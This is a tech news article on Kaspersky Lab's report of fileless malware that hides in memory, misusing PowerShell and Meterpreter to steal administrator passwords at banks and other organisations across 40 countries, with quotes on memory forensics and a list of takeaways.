Organizations in 40 countries across the world have fallen victim to a new trend in cybersecurity attacks: “Invisible” malware that hides within legitimate software. The new attacks were discovered by cybersecurity researchers at Kaspersky Labs, who detailed the issue in a blog post on Wednesday.
According to a press release from Kaspersky, the attacks have been detected on more than 140 enterprise networks, occurring most commonly in the US, France, Ecuador, Kenya, the UK, and Russia. The goal of the attacks is to access the financial systems of the victim organization, the release said.
Windows Powershell, and some “widely available penetration-testing and administration tools,” were among the legitimate software named in the attacks. The release noted that the attacks allow the malware to hide in the memory, with no malware files typically showing up on the hard drive itself.
SEE: Quick glossary: Malware (Tech Pro Research)
This approach complicates detection efforts, and provides few, if any, samples for researchers to work with. And, once the victim reboots their machine, all traces of the attack are wiped, the release said.
“That is why memory forensics is becoming critical to the analysis of malware and its functions,” Sergey Golovanov, principal security researcher at Kaspersky Lab, said in a press release. “In these particular incidents, the attackers used every conceivable anti-forensic technique; demonstrating how no malware files are needed for the successful exfiltration of data from a network, and how the use of legitimate and open source utilities makes attribution almost impossible.”
Kaspersky Lab researchers were initially contacted by banks that noticed Meterpreter software, often associated with “malicious purposes,” in their server memory. Researchers then noticed it was there alongside PowerShell scripts and other legitimate code, the release said.
“The combined tools had been adapted into malicious code that could hide in the memory, invisibly collecting the passwords of system administrators so that the attackers could remotely control the victim’s systems,” the release said. “The ultimate goal appears to have been access to financial processes.”
So far, the attackers are unknown, the release said. It also remains unclear whether or not it is a single person or a group of attackers. However, the researchers noted, the approach is similar to that taken by the hacker groups GCMAN and Carbanak.
It is important to note that whoever perpetrated these attacks is still active, the release said. And, if a security professional was to go looking for evidence of such an attack, detection would only be possible in RAM, the network, and registry.
The 3 big takeaways for TechRepublic readers
- Kaspersky Lab’s global research and analysis team recently detected “invisible” malware that comes in with legitimate software and hides in memory.
- The attacks, which are targeted toward gaining access to financial systems, occurred on 140 networks in 40 countries around the world.
- Researchers said that it is nearly impossible to determine who is behind the attacks, and they urge caution as the attacker is still active.